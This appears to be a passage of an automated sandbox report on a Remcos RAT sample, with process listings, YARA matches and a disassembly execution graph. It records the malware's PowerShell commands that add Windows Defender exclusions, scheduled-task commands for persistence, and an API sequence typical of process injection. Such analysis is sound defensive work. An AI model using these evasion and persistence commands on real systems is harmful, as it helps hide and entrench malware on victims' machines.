                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:13:45:35
                      Start date:25/09/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
                      Imagebase:0xb70000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:3
                      Start time:13:45:36
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
                      Imagebase:0x4a0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:13:45:36
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
                      Imagebase:0x4a0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
                      Imagebase:0xfe0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
                      Imagebase:0x800000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:10
                      Start time:13:45:38
                      Start date:25/09/2024
                      Path:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Imagebase:0x5a0000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 21%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:11
                      Start time:13:45:39
                      Start date:25/09/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff72d8c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:13:45:42
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"
                      Imagebase:0xfe0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:13:45:42
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:15
                      Start time:13:45:43
                      Start date:25/09/2024
                      Path:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
                      Imagebase:0xb0000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:16
                      Start time:13:45:43
                      Start date:25/09/2024
                      Path:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
                      Imagebase:0x6a0000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:12.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:153
                        Total number of Limit Nodes:6
                        execution_graph 24292 2e1d380 24293 2e1d3c6 24292->24293 24297 2e1d560 24293->24297 24300 2e1d550 24293->24300 24294 2e1d4b3 24303 2e1afd4 24297->24303 24301 2e1d58e 24300->24301 24302 2e1afd4 DuplicateHandle 24300->24302 24301->24294 24302->24301 24304 2e1d5c8 DuplicateHandle 24303->24304 24305 2e1d58e 24304->24305 24305->24294 24107 71eb2d8 24108 71eb463 24107->24108 24109 71eb2fe 24107->24109 24109->24108 24111 71e6148 24109->24111 24112 71eb960 PostMessageW 24111->24112 24113 71eb9cc 24112->24113 24113->24109 24114 71e7c84 24115 71e7c8c 24114->24115 24120 71ea17e 24115->24120 24138 71ea118 24115->24138 24155 71ea10a 24115->24155 24116 71e7c9c 24121 71ea10c 24120->24121 24122 71ea181 24120->24122 24123 71ea13a 24121->24123 24172 71ea799 24121->24172 24177 71ea83b 24121->24177 24185 71ea6da 24121->24185 24190 71ea51a 24121->24190 24195 71ea9df 24121->24195 24200 71ea501 24121->24200 24205 71ea7e4 24121->24205 24210 71ea629 24121->24210 24215 71ea9ac 24121->24215 24220 71ea86e 24121->24220 24225 71eaa51 24121->24225 24229 71eaaf1 24121->24229 24233 71ea535 24121->24233 24238 71ea936 24121->24238 24122->24116 24123->24116 24139 71ea132 24138->24139 24140 71ea9df 2 API calls 24139->24140 24141 71ea51a 2 API calls 24139->24141 24142 71ea6da 2 API calls 24139->24142 24143 71ea83b 4 API calls 24139->24143 24144 71ea799 2 API calls 24139->24144 24145 71ea936 2 API calls 24139->24145 24146 71ea535 2 API calls 24139->24146 24147 71ea13a 24139->24147 24148 71eaaf1 2 API calls 24139->24148 24149 71eaa51 2 API calls 24139->24149 24150 71ea86e 2 API calls 24139->24150 24151 71ea9ac 2 API calls 24139->24151 24152 71ea629 2 API calls 24139->24152 24153 71ea7e4 2 API calls 24139->24153 24154 71ea501 2 API calls 24139->24154 24140->24147 24141->24147 24142->24147 24143->24147 24144->24147 24145->24147 24146->24147 24147->24116 24148->24147 24149->24147 24150->24147 24151->24147 24152->24147 24153->24147 24154->24147 24156 71ea10c 24155->24156 24157 71ea9df 2 API calls 24156->24157 24158 71ea51a 2 API calls 24156->24158 24159 71ea6da 2 API calls 24156->24159 24160 71ea83b 4 API calls 24156->24160 24161 71ea799 2 API calls 24156->24161 24162 71ea936 2 API calls 24156->24162 24163 71ea535 2 API calls 24156->24163 24164 71ea13a 24156->24164 24165 71eaaf1 2 API calls 24156->24165 24166 71eaa51 2 API calls 24156->24166 24167 71ea86e 2 API calls 24156->24167 24168 71ea9ac 2 API calls 24156->24168 24169 71ea629 2 API calls 24156->24169 24170 71ea7e4 2 API calls 24156->24170 24171 71ea501 2 API calls 24156->24171 24157->24164 24158->24164 24159->24164 24160->24164 24161->24164 24162->24164 24163->24164 24164->24116 24165->24164 24166->24164 24167->24164 24168->24164 24169->24164 24170->24164 24171->24164 24173 71ea79f 24172->24173 24243 71e6d70 24173->24243 24247 71e6d68 24173->24247 24174 71ea7c5 24174->24123 24259 71e7329 24177->24259 24263 71e7330 24177->24263 24178 71eaffb 24178->24123 24179 71ea7e4 24179->24178 24251 71e73e8 24179->24251 24255 71e73f0 24179->24255 24180 71ea81c 24186 71ea6e0 24185->24186 24188 71e6d68 ResumeThread 24186->24188 24189 71e6d70 ResumeThread 24186->24189 24187 71ea7c5 24187->24123 24188->24187 24189->24187 24191 71ea50d 24190->24191 24192 71ea554 24191->24192 24267 71e766d 24191->24267 24272 71e7678 24191->24272 24192->24123 24196 71ea9e5 24195->24196 24276 71e74d8 24196->24276 24280 71e74e0 24196->24280 24197 71eaa08 24197->24123 24201 71ea50d 24200->24201 24202 71ea65d 24201->24202 24203 71e766d CreateProcessA 24201->24203 24204 71e7678 CreateProcessA 24201->24204 24203->24202 24204->24202 24206 71ea7ea 24205->24206 24208 71e73e8 WriteProcessMemory 24206->24208 24209 71e73f0 WriteProcessMemory 24206->24209 24207 71ea81c 24208->24207 24209->24207 24211 71ea62f 24210->24211 24213 71e766d CreateProcessA 24211->24213 24214 71e7678 CreateProcessA 24211->24214 24212 71ea65d 24213->24212 24214->24212 24216 71ea7c5 24215->24216 24217 71ea7b0 24215->24217 24216->24123 24218 71e6d68 ResumeThread 24217->24218 24219 71e6d70 ResumeThread 24217->24219 24218->24216 24219->24216 24221 71ea891 24220->24221 24223 71e73e8 WriteProcessMemory 24221->24223 24224 71e73f0 WriteProcessMemory 24221->24224 24222 71eab87 24223->24222 24224->24222 24227 71e73e8 WriteProcessMemory 24225->24227 24228 71e73f0 WriteProcessMemory 24225->24228 24226 71eaa75 24227->24226 24228->24226 24284 71e6e18 24229->24284 24288 71e6e20 24229->24288 24230 71ea688 24234 71ea537 24233->24234 24235 71ea65d 24234->24235 24236 71e766d CreateProcessA 24234->24236 24237 71e7678 CreateProcessA 24234->24237 24236->24235 24237->24235 24240 71ea6f1 24238->24240 24239 71ea7c5 24239->24123 24240->24239 24241 71e6d68 ResumeThread 24240->24241 24242 71e6d70 ResumeThread 24240->24242 24241->24239 24242->24239 24244 71e6db0 ResumeThread 24243->24244 24246 71e6de1 24244->24246 24246->24174 24248 71e6db0 ResumeThread 24247->24248 24250 71e6de1 24248->24250 24250->24174 24252 71e73f0 WriteProcessMemory 24251->24252 24254 71e748f 24252->24254 24254->24180 24256 71e7438 WriteProcessMemory 24255->24256 24258 71e748f 24256->24258 24258->24180 24260 71e7370 VirtualAllocEx 24259->24260 24262 71e73ad 24260->24262 24262->24179 24264 71e7370 VirtualAllocEx 24263->24264 24266 71e73ad 24264->24266 24266->24179 24268 71e75fb 24267->24268 24269 71e7676 CreateProcessA 24267->24269 24268->24192 24271 71e78c3 24269->24271 24273 71e7701 CreateProcessA 24272->24273 24275 71e78c3 24273->24275 24277 71e74e0 ReadProcessMemory 24276->24277 24279 71e756f 24277->24279 24279->24197 24281 71e752b ReadProcessMemory 24280->24281 24283 71e756f 24281->24283 24283->24197 24285 71e6e20 Wow64SetThreadContext 24284->24285 24287 71e6ead 24285->24287 24287->24230 24289 71e6e65 Wow64SetThreadContext 24288->24289 24291 71e6ead 24289->24291 24291->24230

                        Executed Functions

                        Function 071E766D Relevance: 1.8, APIs: 1, Instructions: 281processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 71e766d-71e7674 1 71e75fb-71e7632 0->1 2 71e7676-71e770d 0->2 16 71e763b-71e7660 1->16 17 71e7634-71e763a 1->17 7 71e770f-71e7719 2->7 8 71e7746-71e7766 2->8 7->8 9 71e771b-71e771d 7->9 14 71e779f-71e77ce 8->14 15 71e7768-71e7772 8->15 12 71e771f-71e7729 9->12 13 71e7740-71e7743 9->13 18 71e772d-71e773c 12->18 19 71e772b 12->19 13->8 27 71e7807-71e78c1 CreateProcessA 14->27 28 71e77d0-71e77da 14->28 15->14 21 71e7774-71e7776 15->21 17->16 18->18 20 71e773e 18->20 19->18 20->13 23 71e7778-71e7782 21->23 24 71e7799-71e779c 21->24 29 71e7786-71e7795 23->29 30 71e7784 23->30 24->14 42 71e78ca-71e7950 27->42 43 71e78c3-71e78c9 27->43 28->27 31 71e77dc-71e77de 28->31 29->29 33 71e7797 29->33 30->29 34 71e77e0-71e77ea 31->34 35 71e7801-71e7804 31->35 33->24 37 71e77ee-71e77fd 34->37 38 71e77ec 34->38 35->27 37->37 39 71e77ff 37->39 38->37 39->35 53 71e7952-71e7956 42->53 54 71e7960-71e7964 42->54 43->42 53->54 55 71e7958 53->55 56 71e7966-71e796a 54->56 57 71e7974-71e7978 54->57 55->54 56->57 58 71e796c 56->58 59 71e797a-71e797e 57->59 60 71e7988-71e798c 57->60 58->57 59->60 61 71e7980 59->61 62 71e799e-71e79a5 60->62 63 71e798e-71e7994 60->63 61->60 64 71e79bc 62->64 65 71e79a7-71e79b6 62->65 63->62 67 71e79bd 64->67 65->64 67->67
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E78AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: a163494b2f74ee8cf93ac79df69fe2b22a71f24bd32c07124d7e50ca8c6c7017
                        • Instruction ID: 74f9670f1b18cfae12ddbfdb863ddd28ad9f86e2c3567b33085e0401edcde56a
                        • Opcode Fuzzy Hash: a163494b2f74ee8cf93ac79df69fe2b22a71f24bd32c07124d7e50ca8c6c7017
                        • Instruction Fuzzy Hash: 78B18EB1D00619CFEB21CF69C844BEEBBF6BF48314F148569D808A7280DB749985CF91
                        Function 071E7678 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 68 71e7678-71e770d 70 71e770f-71e7719 68->70 71 71e7746-71e7766 68->71 70->71 72 71e771b-71e771d 70->72 76 71e779f-71e77ce 71->76 77 71e7768-71e7772 71->77 74 71e771f-71e7729 72->74 75 71e7740-71e7743 72->75 78 71e772d-71e773c 74->78 79 71e772b 74->79 75->71 85 71e7807-71e78c1 CreateProcessA 76->85 86 71e77d0-71e77da 76->86 77->76 81 71e7774-71e7776 77->81 78->78 80 71e773e 78->80 79->78 80->75 82 71e7778-71e7782 81->82 83 71e7799-71e779c 81->83 87 71e7786-71e7795 82->87 88 71e7784 82->88 83->76 99 71e78ca-71e7950 85->99 100 71e78c3-71e78c9 85->100 86->85 89 71e77dc-71e77de 86->89 87->87 90 71e7797 87->90 88->87 91 71e77e0-71e77ea 89->91 92 71e7801-71e7804 89->92 90->83 94 71e77ee-71e77fd 91->94 95 71e77ec 91->95 92->85 94->94 96 71e77ff 94->96 95->94 96->92 110 71e7952-71e7956 99->110 111 71e7960-71e7964 99->111 100->99 110->111 112 71e7958 110->112 113 71e7966-71e796a 111->113 114 71e7974-71e7978 111->114 112->111 113->114 115 71e796c 113->115 116 71e797a-71e797e 114->116 117 71e7988-71e798c 114->117 115->114 116->117 118 71e7980 116->118 119 71e799e-71e79a5 117->119 120 71e798e-71e7994 117->120 118->117 121 71e79bc 119->121 122 71e79a7-71e79b6 119->122 120->119 124 71e79bd 121->124 122->121 124->124
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E78AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 61f7b081f5cbd5444eeb9719d1e2e66532a985c96100688f0f70122dbacc3e0c
                        • Instruction ID: 59cc5fcaff01290fea0fa8f8019610f0f303540b6c0e04e7900be3561f62179f
                        • Opcode Fuzzy Hash: 61f7b081f5cbd5444eeb9719d1e2e66532a985c96100688f0f70122dbacc3e0c
                        • Instruction Fuzzy Hash: A3916DB1D00619CFEB25CF69C845BEEBBB6BF48310F1481A9D808A72C0DB749985CF91
                        Function 02E1B0E8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 125 2e1b0e8-2e1b0f7 126 2e1b123-2e1b127 125->126 127 2e1b0f9-2e1b106 call 2e1ada0 125->127 128 2e1b129-2e1b133 126->128 129 2e1b13b-2e1b17c 126->129 134 2e1b108 127->134 135 2e1b11c 127->135 128->129 136 2e1b189-2e1b197 129->136 137 2e1b17e-2e1b186 129->137 182 2e1b10e call 2e1b380 134->182 183 2e1b10e call 2e1b370 134->183 135->126 139 2e1b199-2e1b19e 136->139 140 2e1b1bb-2e1b1bd 136->140 137->136 138 2e1b114-2e1b116 138->135 141 2e1b258-2e1b318 138->141 143 2e1b1a0-2e1b1a7 call 2e1adac 139->143 144 2e1b1a9 139->144 142 2e1b1c0-2e1b1c7 140->142 175 2e1b320-2e1b34b GetModuleHandleW 141->175 176 2e1b31a-2e1b31d 141->176 146 2e1b1d4-2e1b1db 142->146 147 2e1b1c9-2e1b1d1 142->147 145 2e1b1ab-2e1b1b9 143->145 144->145 145->142 149 2e1b1e8-2e1b1f1 call 2e1adbc 146->149 150 2e1b1dd-2e1b1e5 146->150 147->146 156 2e1b1f3-2e1b1fb 149->156 157 2e1b1fe-2e1b203 149->157 150->149 156->157 158 2e1b221-2e1b225 157->158 159 2e1b205-2e1b20c 157->159 180 2e1b228 call 2e1b651 158->180 181 2e1b228 call 2e1b680 158->181 159->158 161 2e1b20e-2e1b21e call 2e1adcc call 2e1addc 159->161 161->158 162 2e1b22b-2e1b22e 165 2e1b251-2e1b257 162->165 166 2e1b230-2e1b24e 162->166 166->165 177 2e1b354-2e1b368 175->177 178 2e1b34d-2e1b353 175->178 176->175 178->177 180->162 181->162 182->138 183->138
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: ba62863f1c528090b88b814b52bab58a1fe865ac3ff0c6acb377d82282d9c37f
                        • Instruction ID: cc9da48dfeff5f747814ca44e77d5631e3bde4c2041b970f78c75051466aefe2
                        • Opcode Fuzzy Hash: ba62863f1c528090b88b814b52bab58a1fe865ac3ff0c6acb377d82282d9c37f
                        • Instruction Fuzzy Hash: 42712670A00B059FD724DF6AD4457AABBF1FF88218F008A2ED48AD7B50DB75E845CB91
                        Function 02E1590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 184 2e1590c-2e159d9 CreateActCtxA 186 2e159e2-2e15a3c 184->186 187 2e159db-2e159e1 184->187 194 2e15a4b-2e15a4f 186->194 195 2e15a3e-2e15a41 186->195 187->186 196 2e15a51-2e15a5d 194->196 197 2e15a60-2e15a90 194->197 195->194 196->197 201 2e15a42-2e15a4a 197->201 202 2e15a92-2e15b14 197->202 201->194 205 2e159cf-2e159d9 201->205 205->186 205->187
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5b7f75367332c3aea6ab9e1d960b7c9a8c1eb8c6c0f5e23f8b3e468b57c39b84
                        • Instruction ID: 5d318d51e9b257438e064a1430bff7ff2c9c3852d482461d54d0691e0b832f8f
                        • Opcode Fuzzy Hash: 5b7f75367332c3aea6ab9e1d960b7c9a8c1eb8c6c0f5e23f8b3e468b57c39b84
                        • Instruction Fuzzy Hash: 5541EEB1C00718CFDB24CFA9C8857DEBBB5BF48708F64806AD419AB291DB71694ACF50
                        Function 02E14514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 206 2e14514-2e159d9 CreateActCtxA 209 2e159e2-2e15a3c 206->209 210 2e159db-2e159e1 206->210 217 2e15a4b-2e15a4f 209->217 218 2e15a3e-2e15a41 209->218 210->209 219 2e15a51-2e15a5d 217->219 220 2e15a60-2e15a90 217->220 218->217 219->220 224 2e15a42-2e15a4a 220->224 225 2e15a92-2e15b14 220->225 224->217 228 2e159cf-2e159d9 224->228 228->209 228->210
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: ed693df78edf64dcf9606ac12e50f2766d3bc0e97d063024db750389269910b1
                        • Instruction ID: 57128aa332b90dc80586410fc5aa327bd6ab34baab971b52aea9077f766d43cc
                        • Opcode Fuzzy Hash: ed693df78edf64dcf9606ac12e50f2766d3bc0e97d063024db750389269910b1
                        • Instruction Fuzzy Hash: D141E070C00718CBDB24CFA9C884BDEBBF5BF88714F60806AD418AB295DB716949CF90
                        Function 071EB9F2 Relevance: 1.6, APIs: 1, Instructions: 78windowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 229 71eb9f2-71eb9f8 230 71eb9fa-71eba25 229->230 231 71eb980-71eb9ca PostMessageW 229->231 234 71eba2c-71eba3f 230->234 235 71eba27 230->235 232 71eb9cc-71eb9d2 231->232 233 71eb9d3-71eb9e7 231->233 232->233 238 71eba50-71eba6b 234->238 239 71eba41-71eba4e 234->239 235->234 242 71eba6d 238->242 243 71eba75 238->243 239->238 242->243 244 71eba76 243->244 244->244
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071EB9BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
